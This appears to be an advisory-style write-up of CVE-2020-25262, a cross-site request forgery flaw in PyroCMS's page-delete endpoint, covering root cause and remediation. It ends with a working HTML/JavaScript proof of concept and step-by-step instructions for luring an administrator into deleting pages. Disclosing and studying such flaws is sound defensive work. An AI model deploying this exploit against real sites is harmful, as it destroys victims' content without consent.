CVE-2020-25262

An attacker hosts a malicious HTML page containing JavaScript that sends GET requests to the PyroCMS admin/pages/delete/ URI [ref_id=1]. When an authenticated administrator visits the attacker's page, the script iterates through page IDs (e.g., 1 through 13) and issues XMLHttpRequest calls to delete each page [ref_id=1]. Because the delete action uses a GET request and lacks CSRF protection [CWE-352], the browser automatically includes the victim's session cookies, and the server processes the forged requests as legitimate.

The advisory [ref_id=1] identifies the vulnerable endpoint as the admin/pages/delete/ URI. The researcher's PoC demonstrates that the delete action is triggered via a GET request to URLs of the form http://test.com/admin/pages/delete/{id}. No specific source file or function is named in the bundle.

No patch is published in the bundle. The advisory [ref_id=1] identifies the root cause as the delete action being performed via a GET request without CSRF tokens. The remediation would require the application to enforce CSRF tokens on state-changing operations (such as page deletion) and to use POST/DELETE HTTP methods instead of GET for destructive actions, so that an attacker's cross-origin form or script cannot forge valid requests.

1. Create an HTML file with the following content (adjust the base URL to match the target PyroCMS instance): ```html <!DOCTYPE html> <html> <head> <title></title> <script type="text/javascript"> var url = "http://test.com/admin/pages/delete/" for (var i = 1; i <= 13 ; i++) { var url1 = url+i; xhr = new XMLHttpRequest(); xhr.open('GET', url1, true); xhr.send(); } </script> </head> <body></body> </html> ``` 2. Host the file on an attacker-controlled server. 3. Send the link to an authenticated PyroCMS administrator. 4. When the victim visits the page, pages with IDs 1 through 13 are deleted without their knowledge or consent [ref_id=1].